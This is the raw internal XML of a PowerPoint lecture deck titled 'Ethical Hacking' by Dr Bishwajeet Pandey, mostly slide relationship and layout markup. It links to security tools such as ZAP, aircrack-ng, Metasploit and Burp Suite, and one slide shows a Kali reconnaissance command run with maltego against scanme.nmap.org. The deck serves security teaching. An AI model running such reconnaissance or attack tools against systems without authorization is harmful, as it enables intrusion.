<file path=ppt/slides/_rels/slide16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67.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16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8.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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69.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.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70.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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71.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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72.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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73.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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74.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image143.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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75.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide176.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19.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide177.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19.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide179.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19.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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76.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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77.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image152.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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78.xml"/><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79.xml"/><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80.xml"/><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81.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout19.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image157.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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82.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hyperlink" Target="https://www.scopus.com/authid/detail.uri?authorId=57203239026"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3.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:dr.pandey@ieee.org" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://scholar.google.com/citations?user=UZ_8yAMAAAAJ&amp;hl=hi"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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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83.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135.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9.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1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86.xml"/><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87.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image178.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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89.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image179.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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0.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image180.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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2.xml"/><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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image181.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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21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5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18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6.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image183.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22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7.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image184.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide222.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zaproxy.org/download/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide198.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image177.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image185.png"/></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2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02.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image177.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide227.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.certifiedhacker.com/" TargetMode="External"/><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04.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image177.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image189.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout19.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide231.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image190.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout19.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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9.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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.infosecinstitute.com/courses/ethical-hacking-boot-camp/?utm_source=resources&amp;utm_medium=infosec%20network&amp;utm_campaign=course%20pricing&amp;utm_content=hyperlink" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide209.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.infosecinstitute.com/courses/reverse-engineering-boot-camp/?utm_source=resources&amp;utm_medium=infosec%20network&amp;utm_campaign=skills%20pricing&amp;utm_content=hyperlink" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.infosecinstitute.com/courses/computer-forensics-boot-camp/?utm_source=resources&amp;utm_medium=infosec%20network&amp;utm_campaign=course%20pricing&amp;utm_content=hyperlink" TargetMode="Externa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12.xml"/><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14.xml"/><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20.xml"/><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5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22.xml"/><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23.xml"/><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24.xml"/><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25.xml"/><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26.xml"/><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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.google.com/archive/p/android-x86/downloads" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide228.xml"/><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29.xml"/><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30.xml"/><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3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32.xml"/><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33.xml"/><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9.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3.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide267.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.aircrack-ng.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide239.xml"/><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40.xml"/><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7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42.xml"/><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43.xml"/><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47.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide27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48.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1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9.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3.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide27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51.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout17.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image213.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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8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52.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout17.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide28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53.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image215.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide28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54.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide28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55.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout17.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image216.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide28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56.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide28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57.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image219.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image218.png"/></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9.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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide28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290.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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide291.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19.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide292.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19.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide29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19.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide294.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19.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide29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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide296.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19.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide29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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide29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9.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00.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19.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide30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59.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout19.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide302.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19.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide303.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19.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide304.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19.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide30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19.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide306.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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide307.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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide308.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hyperlink" Target="https://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide38.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hyperlink" Target="https://en.wikipedia.org/wiki/Metasploit_Project"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hyperlink" Target="https://portswigger.net/burp/releases/professional-community-2021-10-3" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide74.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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311738" y="247213"/>
            <a:ext cx="8520600" cy="13848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SzPts val="4500"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4500"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ethical Hacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Google Shape;194;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574581" y="2129906"/>
            <a:ext cx="8520600" cy="792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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t>Dr Bishwajeet Pandey, SMIEEE</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Google Shape;195;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412475" y="3323875"/>
            <a:ext cx="8600700" cy="1871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0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C27BA0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PhD (Gran Sasso Science Institute, L'Aquila, Italy)</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="C27BA0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Visiting Professor at</a:t>
            </a:r>
            <a:endParaRPr sz="2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 sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Institute of Computer Science and Digital Innovation,  </a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>UCSI UNIVERSITY-Malaysia</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Google Shape;196;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271650" y="2571750"/>
            <a:ext cx="8600700" cy="517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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="BF9000"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="Century Gothic"/>
                <a:cs typeface="Century Gothic"/>
                <a:sym typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Associate Professor-Jain University, India</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="BF9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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="Google Shape;255;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8260800" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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root@kali:~# maltego scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>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sz="1400">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="256" name="Google Shape;256;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1152475"/>
            <a:ext cx="9144000" cy="38418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131"/>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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="890" name="Google Shape;890;p131"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="22635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SzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="891" name="Google Shape;891;p131"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="404175" y="376050"/>
            <a:ext cx="8475638" cy="4465163"/>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132"/>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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="898" name="Google Shape;898;p132"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="22635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SzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="899" name="Google Shape;899;p132"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="182166"/>
            <a:ext cx="8343900" cy="477916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pic>
        <p:nvPicPr>
          <p:cNvPr id="905" name="Google Shape;905;p133"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="419728" y="150694"/>
            <a:ext cx="8304544" cy="1244363"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="906" name="Google Shape;906;p133"/>
